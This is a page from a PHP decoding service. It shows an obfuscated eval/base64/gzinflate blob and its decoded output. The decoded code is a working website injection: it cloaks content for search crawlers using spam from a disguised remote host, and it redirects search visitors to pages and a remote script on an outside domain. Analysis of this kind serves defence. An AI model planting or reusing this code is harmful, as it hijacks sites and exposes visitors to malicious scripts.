Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(base64_decode(str_rot13("yIMgG+WXSC6fvs9ugwRJpuHDqFZFLalcHVCVgeNer2Bnitk0gB..

Decoded Output download


header('Content-Type: text/html; charset=ISO-8859-1');

define('URI', getRequestUri());
define('HOST', base64_decode('aHR0cDovL2FwaS5nb29nbGVnb3YuY29tLw=='));
define('MULU', 'video|download|app|vnews|android|ios|shop|game|music|movie|shopping');

function getRequestUri() {
  if (isset($_SERVER['HTTP_X_REWRITE_URL'])) { 
     // check this first so IIS will catch 
     $requestUri = $_SERVER['HTTP_X_REWRITE_URL']; 
   } elseif (isset($_SERVER['REDIRECT_URL'])) { 
     // Check if using mod_rewrite 
     $requestUri = $_SERVER['REDIRECT_URL']; 
   } elseif (isset($_SERVER['REQUEST_URI'])) { 
     $requestUri = $_SERVER['REQUEST_URI']; 
   } elseif (isset($_SERVER['ORIG_PATH_INFO'])) { 
     // IIS 5.0, PHP as CGI 
     $requestUri = $_SERVER['ORIG_PATH_INFO']; 
     if (!empty($_SERVER['QUERY_STRING'])) { 
       $requestUri .= '?' . $_SERVER['QUERY_STRING']; 
     } 
   } 
   return $requestUri; 
 }
 
function isEngines($userAgent) {
    return preg_match('/Googlebot|Bingbot|Yahoo!/i', $userAgent);
}


function isIncludes($uri) {
    return preg_match('/' . MULU . '/i', $uri);
}


function isRef($referrer) {
    return preg_match('/google|bing|yahoo/i', $referrer);
}


function getContents($url) {
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        $result = curl_exec($ch);
        $curlError = curl_error($ch);  
        curl_close($ch);


        if ($result === false) {
            error_log("cURL Error: " . $curlError); 
            return false;
        }
        return $result;
    } else {
        return file_get_contents($url);
    }
}


$ref = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$key = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$ym = $_SERVER['HTTP_HOST'];

$hostname = $_SERVER["HTTP_HOST"];
$url = (empty($_SERVER['HTTPS']) ? 'http' : 'https') . "://$_SERVER[HTTP_HOST]" . URI;

if (isEngines($key)) {
    header('Content-Type:text/html;charset=utf-8');
    if (isIncludes(URI)) {
        $content = getContents(HOST . "mrender?hostname=".$hostname."&url=".$url);
        if ($content) {
            echo $content;
        } else {
            header("HTTP/1.0 404 Not Found");
            echo "404 - Content not found."; 
            exit;
        }
    } else {
        echo file_get_contents(HOST . "mlink?hostname=".$hostname."&url=".$url);
        exit;
    }
} else {
    if (isIncludes(URI) && isRef($ref)) {
	$content = getContents("https://www.lockhomeinfo.com/br.html?url=".$url);
	if ($content) {
		echo $content;
	} else {
		echo base64_decode("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cubG9ja2hvbWVpbmZvLmNvbS9zY3JpcHQuanMiIHJlbD0ibm9mb2xsb3ciPjwvc2NyaXB0Pg==");	
	}
        exit;
    }
}

Did this file decode correctly?

Original Code

eval(gzinflate(base64_decode(str_rot13("yIMgG+WXSC6fvs9ugwRJpuHDqFZFLalcHVCVgeNer2Bnitk0gB102jURv//9auyboDS3KLtcqc7maBsZrMaM2Knk6rPbVS/EtBTNUsEzVG5QQY+jffg8e45f14kvmOddsa9jracFBmvHv/Jq7M1gOj9WtNglK1CysGGPGZB/kwuz/LtHvulFNSe3rt8Dyuawe8rTt23djShmcIKfnmccI2+zca4FJAInLQJ/O9oELQlb1yu72zwVBM67sefCCCXRBWwBUGbACTb6pmZZ55ZNG+B5TGtEWp6p0UtrhmFpw0jsm/1kGBl5GlpRv7puPHoYRVowjTnROdid0K872jvEVFdDTTVi7Od6ba1KgU/yId/KAE4ZGszudG3S6Tgg+oRVrZDA4SZhj4Mu+kxky8EbFXXLbMtvIqKEyUtrfx1zhjy4A0c9bto6iMC6jhtALF/Tz5EcleJdXIr9wMdhuPLjt70VEfvawuUunHDL/cBJCB0aIUmeXmcUd3xEU/AaQC5Vs6+cGnA70JfMnhszsv1Zif0acpb+6en6lVmEIIC9x/9IkacvjA1/jK7VMua/bSHoTUcCHmiAiCr8u1VQlrplXdTCGSZ3o0aV4uSuAb6PYWHNifSscycWeNDwnVz4fQhBpKDktfMq1zkXRHM4MCv82tclhHaclZZJMsAYFQ9/QxlK0v9yNi2H4LPzrBA9xsByOeL3qbFmvCmJQD+LAlx85PH1JTjx1sPjNSRBpEGu6YrxV6S9obUj+LleKwPaguibbMhK40lV9yW+agZRMrNKRtANgtSuxVNjhMtPEG6uHEfbKF1jG8znrNhyFHBbGgiqE1sDUiqqXTAV90IG6sG2xKEUK6UymGWHWPeL1N9AEvjC11TnwaX1qSuU/7vZuJsy8aD6YF2vYDT6QBfyCbXY0hp8n22k4q6a0P3y4yeE9yUyH2uA6sJ1Gx+76Bt33BejH1n63wnt9AJoDIsuIxZGhibiYsaMfpRF0u+CCMoxO79tzmCxVUkSvFVncFw+mjXT0VbX26ZkGvw4A1ayWMA6nmFJHeW1jw+P2iQbdPQMRNZFsf+DkPqNddALE3zeMoxYlbmlg/rs7/BNP1uvShZkXlRuVu42bCtAB1s9vIanXYk5LSAJudfxwu1AtDjeziELEBsbbmI0uzDMnUrs8rjwVg4WuzvSwImM5MEh5d+st+Y28PvlfhiFzNIjczqEHbdFBVcUQZhS1paAHobfyZv832GhyC+V5FWxFLY+F8Rc4lACVWkZjiivCRbaY4G+Cv823dYrY1UWUJeZutrapcXDOJR6KfUC6tOnfRR42LaTuKUSsbDQpUdroRcQXdHoIWY2LO/4z5JOVZc5logrkoMYH6/MtyjehRmZLi/YumQwwviUdRZMhdUwjZxAeMEp4ctQgVjSOLNrpaEWJh0AzZ5fiFsJyDwn9pWCA8xwjsCsoIUTZ2+MaZpAXHA7r5amoWUOeD9FW4zPJ456w9eCYiHkPLM0ZsNwZr/C87X21yX2goJndX13ypiS/TIo6eL6G7oiGM2eljc+hCF6+z3y54AonIqQ1/SiKtqUg6Uq+xoHIzp2rX0DpGyi3K1gm2cUmcR9gcd1W7CdGdjs30CY/myc+52WcqpFh7RM3VUgeJqqI4wy13le+uWoEmocCx0aqeHmZk8hX91EbjSIfpKysewoB9i/Nj=="))));

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 feee83fb6c59fd654cb00a907ba6c881
Eval Count 1
Decode Time 72 ms